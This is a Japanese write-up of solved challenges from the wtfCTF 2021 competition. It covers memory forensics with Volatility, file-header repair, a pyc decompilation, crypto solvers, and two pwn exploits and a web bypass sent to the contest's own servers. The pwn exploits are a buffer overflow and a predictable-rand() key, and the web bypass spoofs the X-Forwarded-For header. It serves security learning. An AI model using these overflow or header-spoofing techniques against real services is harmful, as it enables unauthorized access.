この大会は2021/6/3 15:30(JST)~2021/6/5 15:30(JST)に開催されました。
今回もチームで参戦。結果は4138点で353チーム中8位でした。
自分で解けた問題をWriteupとして書いておきます。
K3YL0gg3r (Miscellaneous)
画像にキー入力らしきものの文字が並んでいる。vi上のキー入力と考え調整しながら、入力を試す。
$ vi keylogger.txt $ cat keylogger.txt d3RmQ1RGe1ZpbV9lRGl0MHJfaSRfNHdlUzBtRX0= $ cat keylogger.txt | base64 -d wtfCTF{Vim_eDit0r_i$_4weS0mE}
wtfCTF{Vim_eDit0r_i$_4weS0mE}
R3veng3 0f th3 Inv151ble (Miscellaneous)
Whitespace言語。https://www.dcode.fr/whitespace-languageで復号する。
wtfCTF{wsp4c3s_m4tt3r!}
W1n_W0n (Miscellaneous)
$ volatility -f Challenge.raw imageinfo Volatility Foundation Volatility Framework 2.6.1 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/Challenge.raw) PAE type : No PAE DTB : 0x187000L KDBG : 0xf80002c450a0L Number of Processors : 4 Image Type (Service Pack) : 1 KPCR for CPU 0 : 0xfffff80002c46d00L KPCR for CPU 1 : 0xfffff880009ef000L KPCR for CPU 2 : 0xfffff88002f69000L KPCR for CPU 3 : 0xfffff88002fdf000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2021-05-21 07:23:36 UTC+0000 Image local date and time : 2021-05-21 00:23:36 -0700 $ volatility -f Challenge.raw --profile=Win7SP1x64 pstree Volatility Foundation Volatility Framework 2.6.1 Name Pid PPid Thds Hnds Time -------------------------------------------------- ------ ------ ------ ------ ---- 0xfffffa8003518460:csrss.exe 388 364 9 491 2021-05-21 07:21:37 UTC+0000 0xfffffa8003115360:wininit.exe 432 364 4 84 2021-05-21 07:21:37 UTC+0000 . 0xfffffa800794db30:lsass.exe 544 432 9 562 2021-05-21 07:21:37 UTC+0000 . 0xfffffa800242c8a0:lsm.exe 556 432 10 144 2021-05-21 07:21:37 UTC+0000 . 0xfffffa800313c060:services.exe 496 432 13 222 2021-05-21 07:21:37 UTC+0000 .. 0xfffffa80034e9b30:svchost.exe 960 496 21 468 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa80035d76c0:svchost.exe 1160 496 22 338 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa8003541b30:spoolsv.exe 1132 496 15 291 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa8002a7ab30:dllhost.exe 1932 496 18 213 2021-05-21 07:21:39 UTC+0000 .. 0xfffffa800346c560:svchost.exe 912 496 37 870 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa8003ce4b30:WmiApSrv.exe 2324 496 8 124 2021-05-21 07:22:00 UTC+0000 .. 0xfffffa800274e5a0:svchost.exe 668 496 12 375 2021-05-21 07:21:37 UTC+0000 ... 0xfffffa8003c18890:WmiPrvSE.exe 1028 668 13 302 2021-05-21 07:21:59 UTC+0000 ... 0xfffffa8007bef370:dllhost.exe 824 668 6 257 2021-05-21 07:23:37 UTC+0000 ... 0xfffffa800373bb30:WmiPrvSE.exe 1604 668 12 206 2021-05-21 07:21:39 UTC+0000 .. 0xfffffa8003447360:svchost.exe 880 496 23 525 2021-05-21 07:21:38 UTC+0000 ... 0xfffffa80037055a0:dwm.exe 1496 880 6 77 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa80039f8960:msdtc.exe 2204 496 15 159 2021-05-21 07:21:39 UTC+0000 .. 0xfffffa80034df060:svchost.exe 328 496 15 512 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa8003ae5b30:SearchIndexer. 2576 496 17 660 2021-05-21 07:21:44 UTC+0000 ... 0xfffffa8003bd1250:SearchProtocol 2728 2576 8 284 2021-05-21 07:21:45 UTC+0000 ... 0xfffffa8003bbab30:SearchFilterHo 2692 2576 6 101 2021-05-21 07:21:45 UTC+0000 .. 0xfffffa80037a3b30:taskhost.exe 1568 496 11 156 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa8008a20250:svchost.exe 2376 496 7 97 2021-05-21 07:21:41 UTC+0000 .. 0xfffffa80033ff920:svchost.exe 840 496 21 421 2021-05-21 07:21:37 UTC+0000 ... 0xfffffa80034a6310:audiodg.exe 992 840 7 133 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa800377fb30:dllhost.exe 1356 496 24 217 2021-05-21 07:21:39 UTC+0000 .. 0xfffffa801cec81c0:VGAuthService. 1488 496 4 87 2021-05-21 07:21:38 UTC+0000 .. 0xfffffa8003251630:svchost.exe 748 496 7 284 2021-05-21 07:21:37 UTC+0000 .. 0xfffffa8003ae1950:VSSVC.exe 2480 496 8 124 2021-05-21 07:21:41 UTC+0000 .. 0xfffffa80037cbb30:vmtoolsd.exe 1656 496 12 279 2021-05-21 07:21:38 UTC+0000 0xfffffa8000ca46f0:System 4 0 104 487 2021-05-21 07:21:31 UTC+0000 . 0xfffffa80029099d0:smss.exe 292 4 2 32 2021-05-21 07:21:31 UTC+0000 0xfffffa80036d7b30:explorer.exe 1524 1428 40 955 2021-05-21 07:21:38 UTC+0000 . 0xfffffa8003cf51b0:cmd.exe 832 1524 1 19 2021-05-21 07:21:59 UTC+0000 . 0xfffffa8001e05940:WinRAR.exe 1640 1524 5 222 2021-05-21 07:23:29 UTC+0000 . 0xfffffa80038a4b30:vm3dservice.ex 1900 1524 5 47 2021-05-21 07:21:38 UTC+0000 . 0xfffffa8006b2d060:MRCv120.exe 2984 1524 18 299 2021-05-21 07:22:27 UTC+0000 . 0xfffffa80038ba310:vmtoolsd.exe 1916 1524 9 172 2021-05-21 07:21:38 UTC+0000 0xfffffa8002bceaa0:csrss.exe 448 440 10 247 2021-05-21 07:21:37 UTC+0000 . 0xfffffa8003cfa2d0:conhost.exe 2300 448 3 51 2021-05-21 07:21:59 UTC+0000 0xfffffa8007dbd9d0:winlogon.exe 528 440 5 117 2021-05-21 07:21:37 UTC+0000 $ volatility -f Challenge.raw --profile=Win7SP1x64 cmdline Volatility Foundation Volatility Framework 2.6.1 ************************************************************************ System pid: 4 ************************************************************************ smss.exe pid: 292 Command line : \SystemRoot\System32\smss.exe ************************************************************************ csrss.exe pid: 388 Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 ************************************************************************ wininit.exe pid: 432 Command line : wininit.exe ************************************************************************ csrss.exe pid: 448 Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 ************************************************************************ services.exe pid: 496 Command line : C:\Windows\system32\services.exe ************************************************************************ winlogon.exe pid: 528 Command line : winlogon.exe ************************************************************************ lsass.exe pid: 544 Command line : C:\Windows\system32\lsass.exe ************************************************************************ lsm.exe pid: 556 Command line : C:\Windows\system32\lsm.exe ************************************************************************ svchost.exe pid: 668 Command line : C:\Windows\system32\svchost.exe -k DcomLaunch ************************************************************************ svchost.exe pid: 748 Command line : C:\Windows\system32\svchost.exe -k RPCSS ************************************************************************ svchost.exe pid: 840 Command line : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted ************************************************************************ svchost.exe pid: 880 Command line : C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted ************************************************************************ svchost.exe pid: 912 Command line : C:\Windows\system32\svchost.exe -k netsvcs ************************************************************************ audiodg.exe pid: 992 Command line : C:\Windows\system32\AUDIODG.EXE 0x2e4 ************************************************************************ svchost.exe pid: 328 Command line : C:\Windows\system32\svchost.exe -k LocalService ************************************************************************ svchost.exe pid: 960 Command line : C:\Windows\system32\svchost.exe -k NetworkService ************************************************************************ spoolsv.exe pid: 1132 Command line : C:\Windows\System32\spoolsv.exe ************************************************************************ svchost.exe pid: 1160 Command line : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork ************************************************************************ VGAuthService. pid: 1488 Command line : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" ************************************************************************ dwm.exe pid: 1496 Command line : "C:\Windows\system32\Dwm.exe" ************************************************************************ explorer.exe pid: 1524 Command line : C:\Windows\Explorer.EXE ************************************************************************ taskhost.exe pid: 1568 Command line : "taskhost.exe" ************************************************************************ vmtoolsd.exe pid: 1656 Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ************************************************************************ vm3dservice.ex pid: 1900 Command line : "C:\Windows\System32\vm3dservice.exe" -u ************************************************************************ vmtoolsd.exe pid: 1916 Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr ************************************************************************ dllhost.exe pid: 1356 Command line : C:\Windows\system32\dllhost.exe /Processid:{AA463B27-DFAF-404C-BC1E-4A5665D5E9EF} ************************************************************************ WmiPrvSE.exe pid: 1604 Command line : C:\Windows\system32\wbem\wmiprvse.exe ************************************************************************ dllhost.exe pid: 1932 Command line : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} ************************************************************************ msdtc.exe pid: 2204 Command line : C:\Windows\System32\msdtc.exe ************************************************************************ svchost.exe pid: 2376 Command line : C:\Windows\system32\svchost.exe -k bthsvcs ************************************************************************ VSSVC.exe pid: 2480 Command line : C:\Windows\system32\vssvc.exe ************************************************************************ SearchIndexer. pid: 2576 Command line : C:\Windows\system32\SearchIndexer.exe /Embedding ************************************************************************ SearchFilterHo pid: 2692 Command line : "C:\Windows\system32\SearchFilterHost.exe" 0 536 540 548 65536 544 ************************************************************************ SearchProtocol pid: 2728 Command line : "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" ************************************************************************ WmiPrvSE.exe pid: 1028 Command line : C:\Windows\system32\wbem\wmiprvse.exe ************************************************************************ cmd.exe pid: 832 Command line : "C:\Windows\system32\cmd.exe" ************************************************************************ conhost.exe pid: 2300 Command line : \??\C:\Windows\system32\conhost.exe ************************************************************************ WmiApSrv.exe pid: 2324 Command line : C:\Windows\system32\wbem\WmiApSrv.exe ************************************************************************ MRCv120.exe pid: 2984 Command line : "C:\Users\anon\Desktop\MRCv120.exe" ************************************************************************ WinRAR.exe pid: 1640 Command line : "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\anon\Documents\1mP.zip" ************************************************************************ dllhost.exe pid: 824 $ volatility -f Challenge.raw --profile=Win7SP1x64 filescan | grep 1mP.zip Volatility Foundation Volatility Framework 2.6.1 0x0000000009793930 16 0 R--rwd \Device\HarddiskVolume2\Users\anon\Documents\1mP.zip $ volatility -f Challenge.raw --profile=Win7SP1x64 dumpfiles -D ./ -Q 0x0000000009793930 Volatility Foundation Volatility Framework 2.6.1 DataSectionObject 0x09793930 None \Device\HarddiskVolume2\Users\anon\Documents\1mP.zip $ volatility -f Challenge.raw --profile=Win7SP1x64 consoles Volatility Foundation Volatility Framework 2.6.1 ************************************************** ConsoleProcess: conhost.exe Pid: 2300 Console: 0xffb46200 CommandHistorySize: 50 HistoryBufferCount: 1 HistoryBufferMax: 4 OriginalTitle: %SystemRoot%\system32\cmd.exe Title: C:\Windows\system32\cmd.exe AttachedProcess: cmd.exe Pid: 832 Handle: 0x10 ---- CommandHistory: 0x298bd0 Application: cmd.exe Flags: Allocated, Reset CommandCount: 1 LastAdded: 0 LastDisplayed: 0 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0x10 Cmd #0 at 0x2975a0: W1np@55 ---- Screen 0x27b110 X:80 Y:300 Dump: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\anon>W1np@55 'W1np@55' is not recognized as an internal or external command, operable program or batch file. C:\Users\anon>W1np@55 'W1np@55' is not recognized as an internal or external command, operable program or batch file. C:\Users\anon> $ mv file.None.0xfffffa80030291a0.dat 1mP.zip $ 7z e -pW1np@55 1mP.zip 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=ja_JP.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz (A0655),ASM,AES-NI) Scanning the drive for archives: 1 file, 4096 bytes (4 KiB) Extracting archive: 1mP.zip WARNINGS: There are data after the end of archive -- Path = 1mP.zip Type = zip WARNINGS: There are data after the end of archive Physical Size = 250 Tail Size = 3846 Everything is Ok Archives with Warnings: 1 Warnings: 1 Size: 28 Compressed: 4096 $ cat 5eCr3T.txt wtfCTF{W1nd0w5_1s_f0r_N0085}
wtfCTF{W1nd0w5_1s_f0r_N0085}
ArchTic (Miscellaneous)
$ sudo docker pull madjelly8504/ctf_challenge Using default tag: latest latest: Pulling from madjelly8504/ctf_challenge 2ed520655641: Pull complete 71981185e000: Pull complete 382982369315: Pull complete d2a0ce0fd011: Pull complete a58b40769af8: Pull complete Digest: sha256:3c12223b418dcd6871f411536ba750653a0c9e8fc9673b8fb5244a8af421b518 Status: Downloaded newer image for madjelly8504/ctf_challenge:latest $ sudo docker save madjelly8504/ctf_challenge > ctf_challenge.tar
tarを展開し、ファイルを見ていく。
ctf_challenge/a5e8f8c071a82f7b3b5ffca6313d388a99c64d3cfcceaaa851f60cf352bee02bの下のlayer.tarを展開する。
layer/.challenge_dir/flag.txtにフラグが書いてあった。
wtfCTF{4rch_1s_fun}
L0v3 (Miscellaneous)
FTK Imagerで開き、削除ファイルを中心に確認してみる。[root]-[Songzzz]-[Attention.wav]をエクスポート。WAVのヘッダ、チャンク部分が壊れているので修復する。
47 49 46 2E → 52 49 46 46 w4VeFMt → WAVEfmt DATA → data
DTMFの音声が入っていて、3桁ずつに区切られている。https://unframework.github.io/dtmf-detect/でデコードする。
119 116 102 067 084 070 123 121 048 085 095 065 114 051 095 103 048 048 100 095
>>> codes = '119 116 102 067 084 070 123 121 048 085 095 065 114 051 095 103 048 048 100 095'
>>> codes = map(int, codes.split(' '))
>>> ''.join([chr(c) for c in codes])
'wtfCTF{y0U_Ar3_g00d_'フラグの前半がわかった。次に[root]-[Imazesss]-[Incognit0.jpg]をエクスポート。JPGのヘッダ部分が壊れているので修復する。
4A 46 → FF D8 jf1f → JFIF
JPG画像にフラグの末尾が書いてある。
47_Da7A_r3c0v3rY}
これでフラグの後半がわかり、前半部分と結合するとフラグになる。
wtfCTF{y0U_Ar3_g00d_47_Da7A_r3c0v3rY}
W1n_W0n_Pr0 (Miscellaneous)
$ volatility -f Challenge2.raw imageinfo Volatility Foundation Volatility Framework 2.6.1 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/Challenge2.raw) PAE type : No PAE DTB : 0x187000L KDBG : 0xf80002c3a0a0L Number of Processors : 4 Image Type (Service Pack) : 1 KPCR for CPU 0 : 0xfffff80002c3bd00L KPCR for CPU 1 : 0xfffff880009ef000L KPCR for CPU 2 : 0xfffff88003169000L KPCR for CPU 3 : 0xfffff880031df000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2021-05-21 08:00:51 UTC+0000 Image local date and time : 2021-05-21 01:00:51 -0700 $ volatility -f Challenge2.raw --profile=Win7SP1x64 userassist Volatility Foundation Volatility Framework 2.6.1 ---------------------------- Registry: \??\C:\Users\anon\ntuser.dat Path: Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count Last updated: 2021-05-21 08:00:38 UTC+0000 Subkeys: Values: REG_BINARY Microsoft.Windows.GettingStarted : Count: 14 Focus Count: 21 Time Focused: 0:07:00.500000 Last updated: 2021-05-21 06:51:08 UTC+0000 Raw Data: 0x00000000 00 00 00 00 0e 00 00 00 15 00 00 00 a0 68 06 00 .............h.. 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad ................ 0x00000040 0d 4e d7 01 00 00 00 00 .N...... : REG_BINARY %windir%\system32\calc.exe : Count: 45★ Focus Count: 45 Time Focused: 0:07:03.446000 Last updated: 2021-05-21 08:00:09 UTC+0000 Raw Data: 0x00000000 00 00 00 00 2d 00 00 00 2d 00 00 00 22 74 06 00 ....-...-..."t.. 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff b0 cd fb 51 ...............Q 0x00000040 17 4e d7 01 00 00 00 00 .N...... REG_BINARY Microsoft.Windows.StickyNotes : Count: 11 Focus Count: 15 Time Focused: 0:05:00.500000 Last updated: 2021-05-21 06:51:08 UTC+0000 Raw Data: 0x00000000 00 00 00 00 0b 00 00 00 0f 00 00 00 e0 93 04 00 ................ 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad ................ 0x00000040 0d 4e d7 01 00 00 00 00 .N...... REG_BINARY %windir%\system32\SnippingTool.exe : Count: 10 Focus Count: 13 Time Focused: 0:04:20.500000 Last updated: 2021-05-21 06:51:08 UTC+0000 Raw Data: 0x00000000 00 00 00 00 0a 00 00 00 0d 00 00 00 a0 f7 03 00 ................ 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad ................ 0x00000040 0d 4e d7 01 00 00 00 00 .N...... REG_BINARY %windir%\system32\mspaint.exe : Count: 14 Focus Count: 45 Time Focused: 0:08:17.665000★ Last updated: 2021-05-21 07:55:49 UTC+0000 Raw Data: 0x00000000 00 00 00 00 0e 00 00 00 2d 00 00 00 0d 96 07 00 ........-....... 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff 40 88 10 b7 ............@... 0x00000040 16 4e d7 01 00 00 00 00 .N...... REG_BINARY %windir%\system32\xpsrchvw.exe : Count: 8 Focus Count: 9 Time Focused: 0:03:00.500000 Last updated: 2021-05-21 06:51:08 UTC+0000 Raw Data: 0x00000000 00 00 00 00 08 00 00 00 09 00 00 00 20 bf 02 00 ................ 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff 84 f5 e8 ad ................ 0x00000040 0d 4e d7 01 00 00 00 00 .N...... : REG_BINARY %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk : Count: 1 Focus Count: 0 Time Focused: 0:00:00.501000 Last updated: 2021-05-21 07:53:35 UTC+0000 Raw Data: 0x00000000 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 ................ 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff 00 3c 42 67 .............<Bg 0x00000040 16 4e d7 01 00 00 00 00 .N...... REG_BINARY C:\Users\anon\Desktop\Calculator.lnk : Count: 27 Focus Count: 0 Time Focused: 0:00:00.527000 Last updated: 2021-05-21 08:00:09 UTC+0000 Raw Data: 0x00000000 00 00 00 00 1b 00 00 00 00 00 00 00 1b 00 00 00 ................ 0x00000010 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000020 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 80 bf ................ 0x00000030 00 00 80 bf 00 00 80 bf ff ff ff ff b0 cd fb 51 ...............Q 0x00000040 17 4e d7 01 00 00 00 00 .N......
calc.exeの実行回数は45回。mspaint.exeが使われていた時間は08:17。
$ volatility --plugins=../plugins -f Challenge2.raw --profile=Win7SP1x64 usbstor Volatility Foundation Volatility Framework 2.6.1 Reading the USBSTOR Please Wait Found USB Drive: 03003017101520132956&0 Serial Number: 03003017101520132956&0 Vendor: SanDisk Product: Cruzer_Blade Revision: 1.00 ClassGUID: Cruzer_Blade ContainerID: {fdd09cf2-78c9-53d6-ba7b-0f5c9266549a} Mounted Volume: \??\Volume{ffe4e32c-ba01-11eb-9be0-bca8a6af9b68} Drive Letter: \DosDevices\E: Friendly Name: SanDisk Cruzer Blade USB Device USB Name: E:\ Device Last Connected: 2021-05-21 08:00:17 UTC+0000★ Class: DiskDrive Service: disk DeviceDesc: @disk.inf,%disk_devdesc%;Disk drive Capabilities: 16 Mfg: @disk.inf,%genmanufacturer%;(Standard disk drives) ConfigFlags: 0 Driver: {4d36e967-e325-11ce-bfc1-08002be10318}\0001 Compatible IDs: USBSTOR\Disk USBSTOR\RAW HardwareID: USBSTOR\DiskSanDisk_Cruzer_Blade____1.00 USBSTOR\DiskSanDisk_Cruzer_Blade____ USBSTOR\DiskSanDisk_ USBSTOR\SanDisk_Cruzer_Blade____1 SanDisk_Cruzer_Blade____1 USBSTOR\GenDisk GenDisk Windows Portable Devices -- FriendlyName: E:\ Serial Number: 03003017101520132956&0 Last Write Time: 2021-05-21 07:17:16 UTC+0000
最後にUSBデバイスを接続したのは2021-05-21 08:00:17。
wtfCTF{45_08:17_2021-05-21_08:00:17}
MoM5m4g1c (Pwn)
getsで格納されるバッファは125バイト。BOFでwaterを\x00以外で上書きしてしまえば、flagが表示される。
$ nc 20.42.99.115 3000 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa wtfCTF{N1c3!n0w_U_c4N_34t_uR_Ch0c0L4t3}
wtfCTF{N1c3!n0w_U_c4N_34t_uR_Ch0c0L4t3}
k3Y (Pwn)
Ghidraでデコンパイルする。
undefined8 main(void) { uint local_10; uint local_c; local_c = rand(); local_10 = 0; printf("Enter the Key: "); __isoc99_scanf(&DAT_00102018,&local_10); if ((local_10 ^ local_c) == 0xacedface) { puts("Yayy! U made it!"); system("cat flag"); } else { puts("Oops!, Best of luck with trying the other 2^32 cases."); } return 0; }
シードなしでrand()を実行する場合、シードが1のrand()を呼び出す。以下のコードをコンパイルして実行して、入力すべき値を調べる。
$ cat get_rand.c #include <stdio.h> #include <stdlib.h> void main() { unsigned int random; random = rand(); printf("%d\n", random ^ 0xacedface); return; } $ gcc get_rand.c -o get_rand $ ./get_rand -949567575
$ nc 20.42.99.115 3143 -949567575 wtfCTF{c0n80!_Th15_i5_tH3_fL48} Enter the Key: Yayy! U made it!
wtfCTF{c0n80!_Th15_i5_tH3_fL48}
H3ll0R3v (Reverse)
バイナリエディタで見ると、pycのフォーマットになっているので、デコンパイルする。
$ mv Hello Hello.pyc $ uncompyle6 Hello.pyc # uncompyle6 version 3.7.4 # Python bytecode 3.8 (3413) # Decompiled from: Python 3.6.9 (default, Jan 26 2021, 15:33:00) # [GCC 8.4.0] # Embedded file name: Hello.py # Compiled at: 2021-05-19 14:23:46 # Size of source mod 2**32: 1923 bytes def main(input): j = -4 for c in input: if j == 1: if c != 'Z': exit(43) else: if j == -7: if c != 'w': exit(133) else: if j == -5: if c != 'f': exit(42069) else: if j == -4: if c != 'C': exit(11037) else: if j == 7: if c != 'R': exit(9001) else: if j == -2: if c != 'F': exit(11037) if j == -1 and c != '{': exit(11037) if j == 4 and c != '3': exit(11037) elif j == 0 and c != '3': exit(11037) else: if j == -3: if c != 'T': exit(82) if j == 2: if c != '_': exit(11037) if j == -6: if c != 't': exit(133) if j == 6: if c != 'E': exit(133) elif j == 9 and c != '3': exit(7223) else: if j == 3: if c != 'R': exit(133) if j == 5: if c != 'V': exit(133) if j == 8: if c != '5': exit(6738) elif j == 10: if c != '}': exit(1111) j += 1 else: print('Hello World') # okay decompiling Hello.pyc
そのままコードを考えると答えが出ない。トップの階層にあるjが1であるかどうかの分岐は次のif文だけにかかると考えるなどして、j=-7の場合のチェックから文字を並べる。
wtfCTF{3Z_R3VER53}
M4sk3r (Web)
https://wtfmasker.herokuapp.com/sourceにアクセスすると、ソースコードが見える。
$ curl https://wtfmasker.herokuapp.com/source const express = require('express'); const app = express(); const port = process.env.PORT; const path = require('path'); const fs = require('fs'); app.use(express.urlencoded({ extended: true })) var SOURCE = ''; fs.readFile(path.dirname(__filename+'/index.js'), 'utf-8', (err, data)=>{ if(err){ console.error(err); return } SOURCE = data; }) const first = process.env.FIRST const second = process.env.SECOND const FLAG = process.env.FLAG const temp = 'wtfCTF{sc4mm3d_4g41n}' app.get('/getFlag', (req, res) => { if ('x-forwarded-for' in req.headers) { // I believe in 0,2,-1 var InternetProtocols = req.headers['x-forwarded-for'].split(', ') if (!InternetProtocols) { return res.status(400).send("<h4>Visible confusion</h4>"); } if ((InternetProtocols[first] !== InternetProtocols[second]) || (InternetProtocols[first] !== InternetProtocols[InternetProtocols.length - 1])) { return res.status(400).send("<h4>The indices I wanted to check don't match, no flag for you :p</h4>"); } var ip = InternetProtocols[first].toString(); if (ip != "6.9.6.9") { return res.status(401).send("Nah, incorrect ip"); } return res.send("Damn, nice one you get to enjoy this : <h4>" + FLAG + "</h4>"); } res.send(temp) }) app.get('/', (req, res) => { res.sendFile(path.join(__dirname, './' ,'index.html')) }) app.get('/source', (req, res) => { res.send(SOURCE); }) app.post('/checkFlag', (req,res)=>{ var inpFlag = req.body.flagInput; if(inpFlag === FLAG){ return res.send("Flag Is Correct! GG"); } res.send("Flag Is wrong"); }) app.listen(port)
1番目と2番目、1番目と最後のX-Forwarded-Forの値が同じで、"6.9.6.9"であれば、フラグが表示される。
$ curl -H "X-Forwarded-For: 6.9.6.9" -H "X-Forwarded-For: 6.9.6.9" https://wtfmasker.herokuapp.com/getFlag Damn, nice one you get to enjoy this : <h4>wtfCTF{just_4n0th3r_h34d3r}</h4>
wtfCTF{just_4n0th3r_h34d3r}
wtf_B0T (Crypto)
Discordに入り、wtf_Bot_CTFとやりとりする。
自分: help
Bot : Say my name
自分: wtf_Bot_CTF
Bot : Your flag is: etrIKT{R15v0zd_N0z_d4gh3k}Vigenere暗号。https://www.dcode.fr/vigenere-cipherでキーを調整しながら復号する。キーは"IAMGROOT"で復号できた。
wtfCTF{D15c0rd_B0t_m4st3r}
V4l1DaT3 (Crypto)
コードからz3で条件を満たすものを探す。
from z3 import * x = [BitVec('x%d' % i, 8) for i in range(18)] s = Solver() s.add(x[0] == ord('k')) s.add(x[1] == ord('3')) s.add(x[2] == ord('3')) s.add(x[3] == ord('p')) s.add(x[4] == x[15]) s.add(x[5] == x[8]) s.add(x[6] == x[12]) s.add(x[7] - x[4] == 42) s.add(x[7] + 1 == x[9]) s.add(x[9] % x[8] == 46) s.add(x[11] - x[8] + x[2] == ord('c')) s.add(x[14] - x[6] == x[17] + 2) s.add((x[9] % x[5]) * 2 == x[13] + 40) s.add(x[4] % x[13] == 15) s.add(x[14] % x[13] == x[12] - 32) s.add((x[7] % x[6]) + 89 == x[10]) s.add(x[16] % x[15] == 17) a = 0 b = 132 for i in range(4, 18): a = a ^ x[i] b = b + x[i] s.add(a == 72) s.add(b == 1250) r = s.check() if r == sat: m = s.model() flag = '' for i in range(18): flag += chr(m[x[i]].as_long()) flag = 'wtfCTF{%s}' % flag print flag
wtfCTF{k33pC@1m@ndp14yCTF}
Pr4nK (Crypto)
pが2の1024乗なので、sageにDLPを解かせる。あとはzを算出し、MessageとのXORをとればよい。
#!/usr/bin/sage from Crypto.Util.number import * with open('msg.txt', 'r') as f: p = int(f.readline().rstrip().split(': ')[1]) b = int(f.readline().rstrip().split(': ')[1]) x = int(f.readline().rstrip().split(': ')[1]) y = int(f.readline().rstrip().split(': ')[1]) Message = int(f.readline().rstrip().split(': ')[1]) F = IntegerModRing(p) s = int(log(F(x), b)) assert pow(b, s, p) == x print '[+] s =', s z = pow(y, s, p) fl = Message ^^ z flag = long_to_bytes(fl).split('\x00')[-1] print '[*] flag:', flag
